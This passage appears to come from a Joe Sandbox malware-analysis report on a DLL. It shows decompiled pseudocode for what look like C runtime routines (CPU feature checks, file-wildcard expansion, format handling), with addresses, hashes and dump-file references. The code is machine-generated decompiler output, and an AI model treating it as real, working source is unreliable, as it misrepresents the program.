									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6da65d04
0x6da65d0b
0x6da65d10
0x6da65d16
0x6da65d19
0x6da65d1f
0x6da65d24
0x6da65d29
0x6da65d29
0x6da65d2f
0x6da65d34
0x6da65d39
0x6da65d39
0x6da65d40
0x6da65d45
0x6da65d4a
0x6da65d4a
0x6da65d51
0x6da65d56
0x6da65d5b
0x6da65d5b
0x6da65d62
0x6da65d67
0x6da65d6c
0x6da65d6c
0x6da65d74
0x6da65d84
0x6da65d96
0x6da65da8
0x6da65dbb
0x6da65dcd
0x6da65dd5
0x6da65dda
0x6da65ddf
0x6da65ddf
0x6da65de6
0x6da65deb
0x6da65deb
0x6da65df2
0x6da65df7
0x6da65df7
0x6da65dfe
0x6da65e03
0x6da65e03
0x6da65e0a
0x6da65e0f
0x6da65e0f
0x6da65e19
0x6da65e1b
0x6da65e55
0x6da65e1d
0x6da65e22
0x6da65e46
0x6da65e4e
0x6da65e42
0x6da65e42
0x6da65e58
0x6da65e5f
0x6da65e61
0x6da65e83
0x6da65e8b
0x6da65e8e
0x6da65e8e
0x6da65e90
0x6da65e90
0x6da65e9b
0x6da65ea1
0x6da65ea6
0x6da65ead
0x6da65ee7
0x6da65ef2
0x6da65ef8
0x6da65efb
0x6da65efe
0x6da65f0a
0x6da65f12
0x6da65eaf
0x6da65eb2
0x6da65ebe
0x6da65ec4
0x6da65eca
0x6da65ecd
0x6da65ed6
0x6da65ed6
0x6da65f15
0x6da65f23
0x6da65f29
0x6da65f2c
0x6da65f31
0x6da65f33
0x6da65f36
0x6da65f36
0x6da65f3b
0x6da65f3d
0x6da65f40
0x6da65f40
0x6da65f45
0x6da65f47
0x6da65f4a
0x6da65f4a
0x6da65f4f
0x6da65f51
0x6da65f54
0x6da65f54
0x6da65f59
0x6da65f5b
0x6da65f5b
0x6da65f68
0x6da65f6b
0x6da65fa2
0x6da65f6d
0x6da65f6d
0x6da65f70
0x6da65f9b
0x6da65f90
0x6da65f90
0x6da65fa4
0x6da65fac
0x6da65faf
0x6da65fce
0x6da65fd3
0x6da65fd3
0x6da65fd5
0x6da65fda
0x6da65fe6
0x6da65fdc
0x6da65fdf
0x6da65fdf
0x6da65feb
0x6da65feb
0x6da65fb1
0x6da65fb4
0x6da65fc3
0x00000000
0x6da65fc3
0x6da65fb6
0x6da65fb9
0x6da65fbb
0x6da65fbb
0x00000000
0x6da65fb9
0x6da65f72
0x6da65f75
0x6da65f8b
0x00000000
0x6da65f8b
0x6da65f7a
0x6da65f7c
0x6da65f7c
0x6da65f7a
0x00000000
0x6da65f6b
0x6da65e68
0x6da65e76
0x6da65e7e
0x00000000
0x6da65e7e
0x6da65e6c
0x6da65e71
0x6da65e71
0x00000000
0x6da65e6c
0x6da65e29
0x6da65e37
0x6da65e3f
0x00000000
0x6da65e3f
0x6da65e2d
0x6da65e32
0x6da65e32
0x6da65e2d

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DA65CF1,?,?,00000008,?,?,6DA6F2FB,00000000), ref: 6DA65F23

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 172640a878e757bb9a6a62fbda4ebf12f7e67628c58315bf4def845b413e9654
Instruction ID: bccfe02d55fe3e396831dc4d76d3d62227805a0cba970a121962840aa6c49843
Opcode Fuzzy Hash: 172640a878e757bb9a6a62fbda4ebf12f7e67628c58315bf4def845b413e9654
Instruction Fuzzy Hash: DBB14D36624649DFDB05CF28C486B757BE0FF45364F298658E8A9CF2A2C335E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA59CE5 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6DA59CE5(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6daa51ac =  *0x6daa51ac & 0x00000000;
				 *0x6da83020 =  *0x6da83020 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6daa51b0; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6daa51b0 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6da83020; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x6daa51ac = 1;
					 *0x6da83020 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6daa51ac = 2;
						 *0x6da83020 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6da83020; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x6daa51ac = 3;
								 *0x6da83020 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6daa51ac = 5;
									 *0x6da83020 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6da83020 =  *0x6da83020 | 0x00000040;
										 *0x6daa51ac = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6daa51b0; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6daa51b0 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x6da59ce5
0x6da59ce8
0x6da59cf2
0x6da59d03
0x6da59eb2
0x6da59eb5
0x6da59eb5
0x6da59d09
0x6da59d0f
0x6da59d14
0x6da59d18
0x6da59d1c
0x6da59d1d
0x6da59d1f
0x6da59d22
0x6da59d27
0x6da59d30
0x6da59d41
0x6da59d4c
0x6da59d52
0x6da59d53
0x6da59d58
0x6da59d5b
0x6da59d60
0x6da59d68
0x6da59d6b
0x6da59d6e
0x6da59db3
0x6da59db3
0x6da59db9
0x6da59db9
0x6da59dbe
0x6da59dbf
0x6da59dc5
0x6da59df6
0x6da59dc7
0x6da59dc9
0x6da59dca
0x6da59dcf
0x6da59dd2
0x6da59dd4
0x6da59dd7
0x6da59dda
0x6da59ddd
0x6da59de0
0x6da59de9
0x6da59dee
0x6da59dee
0x6da59de9
0x6da59df9
0x6da59dfe
0x6da59e01
0x6da59e0b
0x6da59e16
0x6da59e1c
0x6da59e1f
0x6da59e29
0x6da59e34
0x6da59e40
0x6da59e43
0x6da59e46
0x6da59e51
0x6da59e56
0x6da59e58
0x6da59e5d
0x6da59e60
0x6da59e6a
0x6da59e72
0x6da59e77
0x6da59e81
0x6da59e8f
0x6da59ea2
0x6da59ea9
0x6da59ea9
0x6da59e8f
0x6da59e72
0x6da59e56
0x6da59e34
0x00000000
0x6da59eb1
0x6da59d73
0x6da59d7d
0x6da59da2
0x6da59da8
0x6da59dab
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6DA59CFB

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 0686f1e03d592dc6e0ab92441c7275dcf2c517b419ff2a0d8bfb1d55d2e42a5b
Instruction ID: cba1a1f756287cb1033287dbf093e3b5839efd94f910607c3af3dba10a028901
Opcode Fuzzy Hash: 0686f1e03d592dc6e0ab92441c7275dcf2c517b419ff2a0d8bfb1d55d2e42a5b
Instruction Fuzzy Hash: E55166B6A083068FEB05CF55C5817AEBBF0FB49310F28C52AD905EB280D37599A1CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA694B5 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6DA694B5(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				void* _v612;
				signed int _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				char _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				union _FINDEX_INFO_LEVELS _v656;
				char _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t72;
				signed int _t77;
				signed int _t79;
				char _t81;
				signed char _t82;
				signed int _t88;
				signed int _t94;
				signed int _t100;
				signed int _t103;
				signed int _t104;
				signed int _t106;
				intOrPtr* _t112;
				signed int _t115;
				intOrPtr _t125;
				signed int _t127;
				signed int _t130;
				signed int _t132;
				void* _t135;
				void* _t137;
				intOrPtr _t139;
				intOrPtr* _t142;
				signed int _t144;
				void* _t146;
				intOrPtr* _t147;
				signed int _t156;
				void* _t164;
				signed int _t167;
				intOrPtr _t169;
				void* _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				void* _t181;
				signed int _t182;
				void* _t183;
				void* _t184;

				_push(__ecx);
				_t142 = _a4;
				_t2 = _t142 + 1; // 0x1
				_t164 = _t2;
				do {
					_t72 =  *_t142;
					_t142 = _t142 + 1;
				} while (_t72 != 0);
				_t167 = _a12;
				_t144 = _t142 - _t164 + 1;
				_v8 = _t144;
				if(_t144 <=  !_t167) {
					_t5 = _t167 + 1; // 0x1
					_t135 = _t5 + _t144;
					_t174 = E6DA6479A(_t135, 1);
					_t146 = _t173;
					__eflags = _t167;
					if(_t167 == 0) {
						L7:
						_push(_v8);
						_t135 = _t135 - _t167;
						_t77 = E6DA6EA98(_t146, _t174 + _t167, _t135, _a4);
						_t182 = _t181 + 0x10;
						__eflags = _t77;
						if(_t77 != 0) {
							goto L12;
						} else {
							_t139 = _a16;
							_t127 = E6DA69850(_t139);
							_v8 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								 *( *(_t139 + 4)) = _t174;
								_t177 = 0;
								_t14 = _t139 + 4;
								 *_t14 =  *(_t139 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6DA64760(_t174);
								_t177 = _v8;
							}
							E6DA64760(0);
							_t130 = _t177;
							goto L4;
						}
					} else {
						_push(_t167);
						_t132 = E6DA6EA98(_t146, _t174, _t135, _a8);
						_t182 = _t181 + 0x10;
						__eflags = _t132;
						if(_t132 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6DA5DAEC();
							asm("int3");
							_t180 = _t182;
							_t183 = _t182 - 0x298;
							_t79 =  *0x6da83014; // 0xa0d58914
							_v48 = _t79 ^ _t180;
							_t147 = _v32;
							_t165 = _v28;
							_push(_t135);
							_push(0);
							_t169 = _v36;
							_v648 = _t165;
							__eflags = _t147 - _t169;
							if(_t147 != _t169) {
								while(1) {
									_t125 =  *_t147;
									__eflags = _t125 - 0x2f;
									if(_t125 == 0x2f) {
										break;
									}
									__eflags = _t125 - 0x5c;
									if(_t125 != 0x5c) {
										__eflags = _t125 - 0x3a;
										if(_t125 != 0x3a) {
											_t147 = E6DA6F970(_t169, _t147);
											__eflags = _t147 - _t169;
											if(_t147 != _t169) {
												continue;
											}
										}
									}
									break;
								}
								_t165 = _v612;
							}
							_t81 =  *_t147;
							_v605 = _t81;
							__eflags = _t81 - 0x3a;
							if(_t81 != 0x3a) {
								L23:
								__eflags = _t81 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t82 = 1;
								} else {
									__eflags = _t81 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t81 - 0x3a;
										_t82 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v660 = 0;
								_v656 = 0;
								_push(_t174);
								asm("sbb eax, eax");
								_v652 = 0;
								_v648 = 0;
								_v664 =  ~(_t82 & 0x000000ff) & _t147 - _t169 + 0x00000001;
								_v644 = 0;
								_v640 = 0;
								_t88 = E6DA60DCD(_t147 - _t169 + 1, _t169,  &_v660, E6DA691EA(_t165, __eflags));
								_t184 = _t183 + 0xc;
								asm("sbb eax, eax");
								_t175 = FindFirstFileExW( !( ~_t88) & _v652, 0,  &_v604, 0, 0, 0);
								__eflags = _t175 - 0xffffffff;
								if(_t175 != 0xffffffff) {
									_t151 = _v612;
									_t94 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t94;
									_v668 = _t94 >> 2;
									do {
										_v636 = 0;
										_v632 = 0;
										_v628 = 0;
										_v624 = 0;
										_v620 = 0;
										_v616 = 0;
										_t100 = E6DA69272( &(_v604.cFileName),  &_v636,  &_v605, E6DA691EA(_t165, __eflags));
										_t184 = _t184 + 0x10;
										asm("sbb eax, eax");
										_t103 =  !( ~_t100) & _v628;
										__eflags =  *_t103 - 0x2e;
										if( *_t103 != 0x2e) {
											L36:
											_push(_v612);
											_t104 = E6DA694B5(_t151, _t103, _t169, _v664);
											_t184 = _t184 + 0x10;
											_v672 = _t104;
											__eflags = _t104;
											if(_t104 != 0) {
												__eflags = _v616;
												if(_v616 != 0) {
													E6DA64760(_v628);
												}
												FindClose(_t175);
												__eflags = _v640;
												if(_v640 != 0) {
													E6DA64760(_v652);
												}
												_t106 = _v672;
											} else {
												goto L37;
											}
										} else {
											_t151 =  *((intOrPtr*)(_t103 + 1));
											__eflags = _t151;
											if(_t151 == 0) {
												goto L37;
											} else {
												__eflags = _t151 - 0x2e;
												if(_t151 != 0x2e) {
													goto L36;
												} else {
													__eflags =  *(_t103 + 2);
													if( *(_t103 + 2) == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L50;
										L37:
										__eflags = _v616;
										if(_v616 != 0) {
											E6DA64760(_v628);
											_pop(_t151);
										}
										__eflags = FindNextFileW(_t175,  &_v604);
									} while (__eflags != 0);
									_t112 = _v612;
									_t156 = _v668;
									_t165 =  *_t112;
									_t115 =  *((intOrPtr*)(_t112 + 4)) -  *_t112 >> 2;
									__eflags = _t156 - _t115;
									if(_t156 != _t115) {
										__eflags = _t115 - _t156;
										E6DA6F440(_t165, _t165 + _t156 * 4, _t115 - _t156, 4, E6DA6925A);
									}
									FindClose(_t175);
									__eflags = _v640;
									if(_v640 != 0) {
										E6DA64760(_v652);
									}
									_t106 = 0;
								} else {
									_push(_v612);
									_t176 = E6DA694B5( &_v604, _t169, 0, 0);
									__eflags = _v640;
									if(_v640 != 0) {
										E6DA64760(_v652);
									}
									_t106 = _t176;
								}
								L50:
								_pop(_t174);
							} else {
								__eflags = _t147 - _t169 + 1;
								if(_t147 == _t169 + 1) {
									_t81 = _v605;
									goto L23;
								} else {
									_push(_t165);
									_t106 = E6DA694B5(_t147, _t169, 0, 0);
								}
							}
							_pop(_t170);
							__eflags = _v12 ^ _t180;
							_pop(_t137);
							return E6DA59B91(_t106, _t137, _v12 ^ _t180, _t165, _t170, _t174);
						} else {
							goto L7;
						}
					}
				} else {
					_t130 = 0xc;
					L4:
					return _t130;
				}
			}

0x6da694ba
0x6da694bb
0x6da694be
0x6da694be
0x6da694c1
0x6da694c1
0x6da694c3
0x6da694c4
0x6da694c9
0x6da694d0
0x6da694d3
0x6da694d8
0x6da694e2
0x6da694e5
0x6da694ef
0x6da694f2
0x6da694f3
0x6da694f5
0x6da69509
0x6da69509
0x6da6950c
0x6da69516
0x6da6951b
0x6da6951e
0x6da69520
0x00000000
0x6da69522
0x6da69522
0x6da69527
0x6da6952e
0x6da69531
0x6da69533
0x6da69544
0x6da69546
0x6da69548
0x6da69548
0x6da69548
0x6da69535
0x6da69536
0x6da6953b
0x6da6953e
0x6da6954d
0x6da69553
0x00000000
0x6da69556
0x6da694f7
0x6da694f7
0x6da694fd
0x6da69502
0x6da69505
0x6da69507
0x6da69559
0x6da6955b
0x6da6955c
0x6da6955d
0x6da6955e
0x6da6955f
0x6da69560
0x6da69565
0x6da69569
0x6da6956b
0x6da69571
0x6da69578
0x6da6957b
0x6da6957e
0x6da69581
0x6da69582
0x6da69583
0x6da69586
0x6da6958c
0x6da6958e
0x6da69590
0x6da69590
0x6da69592
0x6da69594
0x00000000
0x00000000
0x6da69596
0x6da69598
0x6da6959a
0x6da6959c
0x6da695a7
0x6da695a9
0x6da695ab
0x00000000
0x00000000
0x6da695ab
0x6da6959c
0x00000000
0x6da69598
0x6da695ad
0x6da695ad
0x6da695b3
0x6da695b5
0x6da695bb
0x6da695bd
0x6da695df
0x6da695e1
0x6da695e3
0x6da695ef
0x6da695ef
0x6da695e5
0x6da695e5
0x6da695e7
0x00000000
0x6da695e9
0x6da695e9
0x6da695eb
0x6da695ed
0x00000000
0x00000000
0x6da695ed
0x6da695e7
0x6da695f7
0x6da695ff
0x6da69605
0x6da69606
0x6da69608
0x6da69610
0x6da69616
0x6da6961c
0x6da69622
0x6da69636
0x6da6963b
0x6da69646
0x6da6965c
0x6da6965e
0x6da69661
0x6da69691
0x6da6969a
0x6da6969a
0x6da6969f
0x6da696a5
0x6da696a5
0x6da696ab
0x6da696b1
0x6da696b7
0x6da696bd
0x6da696c3
0x6da696e4
0x6da696e9
0x6da696ee
0x6da696f2
0x6da696f8
0x6da696fb
0x6da6970e
0x6da6970e
0x6da6971c
0x6da69721
0x6da69724
0x6da6972a
0x6da6972c
0x6da697a7
0x6da697ad
0x6da697b5
0x6da697ba
0x6da697bc
0x6da697c2
0x6da697c8
0x6da697d0
0x6da697d5
0x6da697d6
0x00000000
0x00000000
0x00000000
0x6da696fd
0x6da696fd
0x6da69700
0x6da69702
0x00000000
0x6da69704
0x6da69704
0x6da69707
0x00000000
0x6da69709
0x6da69709
0x6da6970c
0x00000000
0x00000000
0x00000000
0x00000000
0x6da6970c
0x6da69707
0x6da69702
0x00000000
0x6da6972e
0x6da6972e
0x6da69734
0x6da6973c
0x6da69741
0x6da69741
0x6da69750
0x6da69750
0x6da69758
0x6da6975e
0x6da69764
0x6da6976b
0x6da6976e
0x6da69770
0x6da69777
0x6da69780
0x6da69785
0x6da69789
0x6da6978f
0x6da69795
0x6da6979d
0x6da697a2
0x6da697a3
0x6da69663
0x6da69663
0x6da69674
0x6da69676
0x6da6967c
0x6da69684
0x6da69689
0x6da6968a
0x6da6968a
0x6da697dc
0x6da697dc
0x6da695bf
0x6da695c2
0x6da695c4
0x6da695d9
0x00000000
0x6da695c6
0x6da695c6
0x6da695cc
0x6da695d1
0x6da695c4
0x6da697e0
0x6da697e1
0x6da697e3
0x6da697ea
0x00000000
0x00000000
0x00000000
0x6da69507
0x6da694da
0x6da694dc
0x6da694dd
0x6da694df
0x6da694df

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44ac5dabe094a57ac1067ff707cb94bd28fc846c83654070d9ab603b45db5c0
Instruction ID: bc89e5c2c66d226ebf9bda14144745ede15bfda8805f1b92142681863850e693
Opcode Fuzzy Hash: e44ac5dabe094a57ac1067ff707cb94bd28fc846c83654070d9ab603b45db5c0
Instruction Fuzzy Hash: 4D41C3B5809259AFDF10DF69CD88AAABBB8EF45304F1442D9E41DD3200EB359E858F60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5F07E Relevance: 1.6, Strings: 1, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6DA5F07E(signed int __ecx, signed int __edx, void* __edi) {
				signed int _v8;
				char _v16;
				signed int _v18;
				signed int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t115;
				char _t117;
				signed int _t118;
				void* _t119;
				signed int _t120;
				signed char _t123;
				signed int _t127;
				signed char _t132;
				signed char _t135;
				signed int* _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				signed int* _t156;
				signed int _t158;
				signed int _t159;
				signed int* _t160;
				signed int* _t166;
				signed char _t169;
				signed char _t171;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				signed int _t180;
				signed int* _t181;
				void* _t183;
				signed int _t187;
				unsigned int _t190;
				signed int _t192;
				signed int** _t193;
				signed short* _t194;
				signed char _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr _t211;
				signed int _t214;
				void* _t215;
				signed int* _t216;
				signed int _t217;
				signed int _t218;
				signed int** _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;

				_t215 = __edi;
				_t208 = __edx;
				_t115 =  *0x6da83014; // 0xa0d58914
				_v8 = _t115 ^ _t220;
				_t218 = __ecx;
				_t179 = 0;
				_v32 = __ecx;
				_t183 = 0x58;
				_t117 =  *((char*)(__ecx + 0x2d));
				_t222 = _t117 - 0x64;
				if(_t222 > 0) {
					__eflags = _t117 - 0x70;
					if(__eflags > 0) {
						_t118 = _t117 - 0x73;
						__eflags = _t118;
						if(_t118 == 0) {
							L9:
							_t119 = E6DA5F790(_t218);
							L10:
							if(_t119 != 0) {
								__eflags =  *((intOrPtr*)(_t218 + 0x2c)) - _t179;
								if( *((intOrPtr*)(_t218 + 0x2c)) != _t179) {
									L104:
									_t120 = 1;
									L105:
									return E6DA59B91(_t120, _t179, _v8 ^ _t220, _t208, _t215, _t218);
								}
								_t123 =  *(_t218 + 0x1c) >> 4;
								_v20 = _t179;
								_t187 = _t179;
								_v18 = _t179;
								_v28 = _t187;
								__eflags = 1 & _t123;
								if((1 & _t123) == 0) {
									L44:
									_t211 =  *((intOrPtr*)(_t218 + 0x2d));
									__eflags = _t211 - 0x78;
									if(_t211 == 0x78) {
										L46:
										__eflags = 1;
										if(1 != 0) {
											L48:
											__eflags = _t211 - 0x61;
											if(_t211 == 0x61) {
												L50:
												_t127 = 1;
												L51:
												__eflags = _t127;
												if(_t127 != 0) {
													L53:
													 *((char*)(_t220 + _t187 - 0x10)) = 0x30;
													__eflags = _t211 - 0x58;
													if(_t211 == 0x58) {
														L56:
														0x78 = 0x58;
														L57:
														 *((char*)(_t220 + _t187 - 0xf)) = 0x78;
														_t187 = _t187 + 2;
														__eflags = _t187;
														_v28 = _t187;
														L58:
														_t208 =  *((intOrPtr*)(_t218 + 0x20)) -  *((intOrPtr*)(_t218 + 0x34)) - _t187;
														__eflags =  *(_t218 + 0x1c) & 0x0000000c;
														_push(_t215);
														_v36 = _t208;
														if(( *(_t218 + 0x1c) & 0x0000000c) != 0) {
															L70:
															_push( *((intOrPtr*)(_t218 + 8)));
															_t216 = _t218 + 0x14;
															_v28 = _t218 + 0x448;
															E6DA5F907(_t218 + 0x448,  &_v20, _t187, _t216);
															_t190 =  *(_t218 + 0x1c);
															_t132 = _t190 >> 3;
															__eflags = _t132 & 0x00000001;
															if((_t132 & 0x00000001) == 0) {
																L83:
																__eflags =  *((char*)(_t218 + 0x38));
																if( *((char*)(_t218 + 0x38)) == 0) {
																	L91:
																	_push( *((intOrPtr*)(_t218 + 8)));
																	E6DA5F907(_t218 + 0x448,  *(_t218 + 0x30),  *((intOrPtr*)(_t218 + 0x34)), _t216);
																	L92:
																	_t192 =  *_t216;
																	__eflags = _t192;
																	if(_t192 < 0) {
																		L103:
																		_pop(_t215);
																		goto L104;
																	}
																	_t135 =  *(_t218 + 0x1c) >> 2;
																	__eflags = _t135 & 0x00000001;
																	if((_t135 & 0x00000001) == 0) {
																		goto L103;
																	}
																	_t218 = _v36;
																	__eflags = _t218;
																	if(_t218 <= 0) {
																		goto L103;
																	} else {
																		goto L95;
																	}
																	while(1) {
																		L95:
																		_t208 =  *_v28;
																		__eflags =  *((intOrPtr*)(_t208 + 8)) -  *((intOrPtr*)(_t208 + 4));
																		if( *((intOrPtr*)(_t208 + 8)) !=  *((intOrPtr*)(_t208 + 4))) {
																			_t193 = _v28;
																			 *_t216 = _t192 + 1;
																			 *((intOrPtr*)(_t208 + 8)) =  *((intOrPtr*)(_t208 + 8)) + 1;
																			 *( *( *_t193)) = 0x20;
																			_t141 =  *_t193;
																			 *_t141 =  *_t141 + 1;
																			__eflags =  *_t141;
																			_t192 =  *_t216;
																		} else {
																			__eflags =  *((char*)(_t208 + 0xc));
																			if( *((char*)(_t208 + 0xc)) == 0) {
																				_t192 = _t192 | 0xffffffff;
																				__eflags = _t192;
																			} else {
																				_t192 = _t192 + 1;
																			}
																			 *_t216 = _t192;
																		}
